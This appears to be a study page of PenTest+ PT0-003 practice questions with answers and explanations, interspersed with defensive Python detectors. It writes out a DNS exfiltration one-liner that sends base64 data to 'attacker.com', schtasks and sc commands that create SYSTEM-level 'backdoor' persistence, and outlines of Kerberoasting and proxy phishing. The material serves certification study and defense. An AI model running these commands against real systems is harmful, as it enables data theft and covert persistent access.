Practice Free PT0-003 Exam Online Questions
A penetration tester needs to complete cleanup activities from the testing lead.
Which of the following should the tester do to validate that reverse shell payloads are no longer running?
- A . Run scripts to terminate the implant on affected hosts.
- B . Spin down the C2 listeners.
- C . Restore the firewall settings of the original affected hosts.
- D . Exit from C2 listener active sessions.
A
Explanation:
To ensure that reverse shell payloads are no longer running, it is essential to actively terminate any implanted malware or scripts.
Here's why option A is correct:
Run Scripts to Terminate the Implant: This ensures that any reverse shell payloads or malicious implants are actively terminated on the affected hosts. It is a direct and effective method to clean up after a penetration test.
Spin Down the C2 Listeners: This stops the command and control listeners but does not remove the implants from the hosts.
Restore the Firewall Settings: This is important for network security but does not directly address the termination of active implants.
Exit from C2 Listener Active Sessions: This closes the current sessions but does not ensure that implants are terminated.
Reference from Pentest:
Anubis HTB: Demonstrates the process of cleaning up and ensuring that all implants are removed after an assessment.
Forge HTB: Highlights the importance of thoroughly cleaning up and terminating any payloads or implants to leave the environment secure post-assessment.
A penetration tester is evaluating a company’s cybersecurity preparedness. The tester wants to acquire valid credentials using a social engineering campaign.
Which of the following tools and techniques are most applicable in this scenario? (Select two).
- A . TruffleHog for collecting credentials
- B . Shodan for identifying potential targets
- C . Gophish for sending phishing emails
- D . Maltego for organizing targets
- E . theHarvester for discovering additional targets
- F . Evilginx for handling legitimate authentication requests through a proxy
C,F
Explanation:
To acquire valid credentials through a social engineering campaign, the tester needs (1) a way to deliver controlled phishing messages and track engagement, and (2) a method to capture authentication material when targets attempt to log in. Gophish is a phishing campaign framework used to send realistic emails, manage templates and landing pages, and collect campaign metrics (opens, clicks, submitted data). This directly supports the operational side of a sanctioned phishing assessment described in PenTest+ social engineering activities.
Evilginx aligns with credential acquisition by acting as a reverse-proxy phishing technique that relays “real” authentication traffic to the legitimate site while capturing credentials and related session artifacts during the login flow. This is especially relevant in modern environments where testers may need to evaluate the effectiveness of protections like MFA and conditional access controls.
A penetration tester has discovered sensitive files on a system.
Assuming exfiltration of the files is part of the scope of the test, which of the following is most likely to evade DLP systems?
- A . Encoding the data and pushing through DNS to the tester’s controlled server.
- B . Padding the data and uploading the files through an external cloud storage service.
- C . Obfuscating the data and pushing through FTP to the tester’s controlled server.
- D . Hashing the data and emailing the files to the tester’s company inbox.
A
Explanation:
DLP (Data Loss Prevention) systems monitor and block sensitive data transfers over HTTP, FTP, Email, and removable devices.
Encoding the data and exfiltrating through DNS (Option A):
DNS is often overlooked by DLP systems because it is required for network functionality.
Attackers use DNS tunneling tools (e.g., dnscat2, iodine) to exfiltrate data inside DNS queries.
Example method:
echo "Sensitive Data" | base64 | nslookup -q=TXT attacker.com
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Data Exfiltration Techniques"
Incorrect options:
Option B (Cloud storage): Many organizations monitor file uploads to cloud storage.
Option C (FTP): FTP is easily monitored and flagged by DLP solutions.
Option D (Hashing and emailing): Emails are actively scanned by DLP policies.
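As an added detection-side example (not from the study guide), the following Python scores DNS query names from constructed log lines: a long, base64-like label below the registrable domain with high Shannon entropy is the trace that the encoded TXT lookup shown above leaves in resolver logs. The log format, thresholds and domain names are assumptions.

```python
import math
import re
from collections import Counter

# Constructed sample DNS query log (assumed "<time> <client-ip> <qtype> <qname>").
SAMPLE_LOG = """\
2024-05-01T10:00:01 10.0.0.5 A www.example.com
2024-05-01T10:00:02 10.0.0.5 TXT U2Vuc2l0aXZlIERhdGEK.attacker.com
2024-05-01T10:00:03 10.0.0.7 A mail.example.com
2024-05-01T10:00:04 10.0.0.5 TXT Q29uZmlkZW50aWFsIGN1c3RvbWVyIGxpc3QgMjAyNAo.attacker.com
2024-05-01T10:00:05 10.0.0.9 AAAA cdn.example.net
"""

# Standard and URL-safe base64 alphabet; ordinary hostnames rarely need '+', '/', '='.
BASE64ISH = re.compile(r"^[A-Za-z0-9+/=_-]+$")

def shannon_entropy(s: str) -> float:
    """Bits per character: words score low, encoded blobs score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def is_suspicious_qname(qname: str, min_label: int = 20, min_entropy: float = 3.5) -> bool:
    """True if a label below the registrable domain looks like encoded data.
    Assumption: the registrable domain is the last two labels (use a
    public-suffix list in production)."""
    labels = qname.rstrip(".").split(".")
    return any(len(lbl) >= min_label and BASE64ISH.match(lbl)
               and shannon_entropy(lbl) >= min_entropy for lbl in labels[:-2])

def scan_dns_log(text: str) -> list:
    """Return (client, qtype, qname) for every query that trips the heuristic."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of aborting the scan
        _ts, client, qtype, qname = parts
        if is_suspicious_qname(qname):
            hits.append((client, qtype, qname))
    return hits
```

Tune `min_label` and `min_entropy` against a baseline of your own resolver traffic; CDN and anti-spam hostnames are the usual false positives.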
A tester wants to pivot from a compromised host to another network with encryption and the least amount of interaction with the compromised host.
Which of the following is the best way to accomplish this objective?
- A . Create an SSH tunnel using sshuttle to forward all the traffic to the compromised computer.
- B . Configure a VNC server on the target network and access the VNC server from the compromised computer.
- C . Set up a Metasploit listener on the compromised computer and create a reverse shell on the target network.
- D . Create a Netcat connection to the compromised computer and forward all the traffic to the target network.
A
Explanation:
Pivoting allows attackers to use a compromised host as a gateway to access internal resources.
Create an SSH tunnel using sshuttle (Option A):
sshuttle creates a transparent VPN-like connection over SSH, allowing the tester to forward traffic securely.
Advantages:
Provides encryption, preventing IDS/IPS detection.
Requires minimal interaction with the compromised host.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Pivoting and Lateral Movement
Techniques"
Incorrect options:
Option B (VNC server): VNC lacks encryption and is easily detectable.
Option C (Metasploit listener): Reverse shells can be detected by EDR solutions.
Option D (Netcat connection): Netcat is plaintext, making it highly detectable.
Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time.
Which of the following is the best tool for this task?
- A . Burp Suite
- B . masscan
- C . Nmap
- D . hping
B
Explanation:
When needing to scan a large network for open ports quickly, the choice of tool is critical.
Here's why option B is correct:
masscan: This tool is designed for high-speed port scanning and can scan entire networks much faster than traditional tools like Nmap. It can handle large ranges of IP addresses and ports with high efficiency.
Nmap: While powerful and versatile, Nmap is generally slower than masscan for scanning very large networks, especially when speed is crucial.
Burp Suite: This tool is primarily for web application security testing and not optimized for network-wide port scanning.
hping: This is a network tool used for packet crafting and network testing, but it is not designed for high-speed network port scanning.
Reference from Pentest:
Luke HTB: Highlights the use of efficient tools for large-scale network scanning to identify open ports quickly.
Anubis HTB: Demonstrates scenarios where high-speed scanning tools like masscan are essential for large network assessments.
In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization.
Through which of the following features could this information have been accessed?
- A . IAM
- B . Block storage
- C . Virtual private cloud
- D . Metadata services
D
Explanation:
In a cloud environment, the information used to configure virtual machines during their initialization could have been accessed through metadata services.
Metadata Services:
Definition: Cloud service providers offer metadata services that provide information about the running instance, such as instance ID, hostname, network configurations, and user data.
Access: These services are accessible from within the virtual machine and often include sensitive information used during the initialization and configuration of the VM.
Other Features:
IAM (Identity and Access Management): Manages permissions and access to resources but does not directly expose initialization data.
Block Storage: Provides persistent storage but does not directly expose initialization data.
Virtual Private Cloud (VPC): Provides network isolation for cloud resources but does not directly expose initialization data.
Pentest Reference: Cloud Security: Understanding how metadata services work and the potential risks associated with them is crucial for securing cloud environments.
Exploitation: Metadata services can be exploited to retrieve sensitive data if not properly secured.
By accessing metadata services, an attacker can retrieve sensitive configuration information used during VM initialization, which can lead to further exploitation.
A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week.
Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).
- A . schtasks.exe
- B . rundll.exe
- C . cmd.exe
- D . chgusr.exe
- E . sc.exe
- F . netsh.exe
A,E
Explanation:
To reenter the system remotely after the patch for the recently exploited RCE vulnerability has been deployed, the penetration tester can use schtasks.exe and sc.exe.
schtasks.exe:
Purpose: Used to create, delete, and manage scheduled tasks on Windows systems.
Persistence: By creating a scheduled task, the tester can ensure a script or program runs at a specified time, providing a persistent backdoor.
Example:
schtasks /create /tn "Backdoor" /tr "C:\path\to\backdoor.exe" /sc daily /ru SYSTEM
sc.exe:
Purpose: Service Control Manager command-line tool used to manage Windows services.
Persistence: By creating or modifying a service to run a malicious executable, the tester can maintain persistent access.
Example:
sc create backdoor binPath= "C:\path\to\backdoor.exe" start= auto
Other Utilities:
rundll.exe: Used to run DLLs as applications, not typically used for persistence.
cmd.exe: General command prompt, not specifically used for creating persistence mechanisms.
chgusr.exe: Used to change install mode for Remote Desktop Session Host, not relevant for persistence.
netsh.exe: Used for network configuration, not typically used for persistence.
Pentest Reference: Post-Exploitation: Establishing persistence is crucial to maintaining access after initial exploitation.
Windows Tools: Understanding how to leverage built-in Windows tools like schtasks.exe and sc.exe to create backdoors that persist through reboots and patches.
By using schtasks.exe and sc.exe, the penetration tester can set up persistent mechanisms that will allow reentry into the system even after the patch is applied.
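As an added hunting example (not from the study guide), the following Python reviews a constructed inventory of scheduled tasks and services and flags the pattern the two commands above produce: a task running as SYSTEM, or an auto-start service, whose executable lives outside the Windows and Program Files directories. The inventory fields and trusted-directory list are assumptions.

```python
import re

# Constructed inventory. Assumed to be reduced already from "schtasks /query /fo CSV /v"
# and "sc qc <name>" output; the field names are this example's own.
SAMPLE_TASKS = [
    {"name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "run_as": "SYSTEM",
     "command": "C:\\Windows\\System32\\defrag.exe -c"},
    {"name": "\\Backdoor", "run_as": "SYSTEM",
     "command": "\"C:\\Users\\Public\\backdoor.exe\""},
]
SAMPLE_SERVICES = [
    {"name": "Spooler", "start": "AUTO_START",
     "binpath": "C:\\Windows\\System32\\spoolsv.exe"},
    {"name": "backdoor", "start": "AUTO_START",
     "binpath": "C:\\ProgramData\\backdoor.exe"},
]

# Directories where SYSTEM tasks and auto-start services normally live (assumption:
# a baseline of the organisation's own software paths would be added here).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def executable_of(command: str) -> str:
    """Return the program path from a command line, quoted or bare."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', command)
    return (m.group(1) or m.group(2)) if m else command

def is_untrusted_path(path: str) -> bool:
    p = path.lower()
    return not any(p.startswith(d) for d in TRUSTED_DIRS)

def find_suspicious_persistence(tasks: list, services: list) -> list:
    """Flag SYSTEM tasks and auto-start services whose binary sits outside trusted dirs."""
    findings = []
    for t in tasks:
        exe = executable_of(t["command"])
        if t["run_as"].upper() == "SYSTEM" and is_untrusted_path(exe):
            findings.append(("task", t["name"], exe))
    for s in services:
        exe = executable_of(s["binpath"])
        if s["start"].upper() == "AUTO_START" and is_untrusted_path(exe):
            findings.append(("service", s["name"], exe))
    return findings
```

Security event 4698 (scheduled task created) and System event 7045 (service installed) give the same signal at creation time; this inventory check catches what was created before logging was turned on.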
A penetration tester must identify vulnerabilities within an ICS (Industrial Control System) that is not connected to the internet or enterprise network.
Which of the following should the tester utilize to conduct the testing?
- A . Channel scanning
- B . Stealth scans
- C . Source code analysis
- D . Manual assessment
D
Explanation:
Since the ICS is air-gapped (not connected to external networks), the best approach is manual assessment, which involves on-site testing, physical access, and reviewing configurations to identify vulnerabilities.
Option A (Channel scanning) ❌: This is used for wireless networks, not for isolated ICS systems.
Option B (Stealth scans) ❌: A stealth scan is a method to avoid detection while scanning, but it still requires network connectivity.
Option C (Source code analysis) ❌: If the ICS is a proprietary system, source code might not be available. Also, vulnerabilities could exist outside the code, such as misconfigurations.
Option D (Manual assessment) ✅: Correct. The ICS is offline, so a manual review of system settings, firmware, and configurations is the best approach.
Reference: CompTIA PenTest+ PT0-003 Official Guide – ICS & SCADA Testing
During an assessment, a penetration tester runs the following command:
setspn.exe -Q */*
Which of the following attacks is the penetration tester preparing for?
- A . LDAP injection
- B . Pass-the-hash
- C . Kerberoasting
- D . Dictionary
C
Explanation:
Kerberoasting is an attack that involves requesting service tickets for service accounts from a Kerberos service, extracting the service tickets, and attempting to crack them offline to retrieve the plaintext passwords.
Understanding Kerberoasting:
Purpose: To obtain service account passwords by cracking the encrypted service tickets (TGS tickets) offline.
Service Principal Names (SPNs): SPNs are used in Kerberos authentication to uniquely identify a service instance.
Command Breakdown:
setspn.exe -Q */*: This command queries all SPNs in the domain.
Use Case: Identifying accounts with SPNs that can be targeted for Kerberoasting.
Kerberoasting Steps:
Identify SPNs: Use setspn.exe to list service accounts with SPNs.
Request TGS Tickets: Request TGS tickets for the identified SPNs.
Extract Tickets: Use tools like Mimikatz to extract the service tickets.
Crack Tickets: Use password cracking tools like Hashcat to crack the extracted tickets offline.
Reference from Pentesting Literature:
Kerberoasting is a well-documented attack method in penetration testing guides, specifically targeting service accounts in Active Directory environments.
HTB write-ups often detail the use of Kerberoasting for gaining credentials from service accounts.
Reference: Penetration Testing – A Hands-on Introduction to Hacking; HTB Official Writeups
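As an added detection-side example (not from the study guide), the following Python applies the standard Kerberoasting hunt to constructed Security event 4769 records: one account requesting RC4-HMAC (ticket encryption type 0x17) service tickets for several distinct non-machine SPNs inside a short window, which is what the "Request TGS Tickets" step above looks like to the domain controller. The export format, window and threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4769 fields, assumed already exported as
# "time,account,service_name,ticket_encryption_type,client_address".
SAMPLE_4769 = """\
2024-05-01T09:00:00,alice@CORP.LOCAL,WS01$,0x12,10.0.0.5
2024-05-01T09:00:01,bob@CORP.LOCAL,svc_sql,0x17,10.0.0.8
2024-05-01T09:00:02,bob@CORP.LOCAL,svc_web,0x17,10.0.0.8
2024-05-01T09:00:03,bob@CORP.LOCAL,svc_backup,0x17,10.0.0.8
2024-05-01T09:00:04,bob@CORP.LOCAL,svc_sccm,0x17,10.0.0.8
2024-05-01T09:00:30,alice@CORP.LOCAL,krbtgt,0x12,10.0.0.5
2024-05-01T09:05:00,carol@CORP.LOCAL,svc_sql,0x17,10.0.0.11
"""

RC4_HMAC = "0x17"  # etype requested by classic Kerberoasting tools; AES is 0x11/0x12

def parse_events(text: str) -> list:
    events = []
    for line in text.splitlines():
        t, account, service, etype, client = line.split(",")
        events.append({"time": datetime.fromisoformat(t), "account": account,
                       "service": service, "etype": etype.lower(), "client": client})
    return events

def is_roastable_target(service: str) -> bool:
    """Machine accounts (trailing $) and krbtgt are not what a Kerberoaster asks for."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def find_kerberoast_bursts(events: list, window: timedelta = timedelta(minutes=5),
                           min_spns: int = 3) -> dict:
    """Map account -> sorted SPN list for accounts that requested RC4 tickets for
    at least min_spns distinct user-account services inside one window."""
    by_account = defaultdict(list)
    for e in events:
        if e["etype"] == RC4_HMAC and is_roastable_target(e["service"]):
            by_account[e["account"]].append(e)
    alerts = {}
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):
            spns = {e["service"] for e in evs[i:] if e["time"] - start["time"] <= window}
            if len(spns) >= min_spns:
                alerts[account] = sorted(spns)
                break
    return alerts
```

Forcing AES-only service accounts and long random passwords on accounts with SPNs makes the cracking step above impractical even when the request is not caught.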
A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools.
Which of the following is the best tool for the penetration tester to use?
- A . Caldera
- B . SpiderFoot
- C . Maltego
- D . WIGLE.net
C
Explanation:
Penetration testers use OSINT (Open-Source Intelligence) tools to collect and analyze reconnaissance data.
Maltego (Option C):
Maltego is a powerful graph-based OSINT tool that integrates data from multiple sources (e.g., social media, DNS records, leaked credentials).
It automates data correlation and helps visualize connections.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "OSINT and Intelligence Gathering"
Incorrect options:
Option A (Caldera): Used for adversary emulation, not OSINT.
Option B (SpiderFoot): A reconnaissance tool but lacks data correlation capabilities.
Option D (WIGLE.net): A wireless network database, not an OSINT analysis tool.
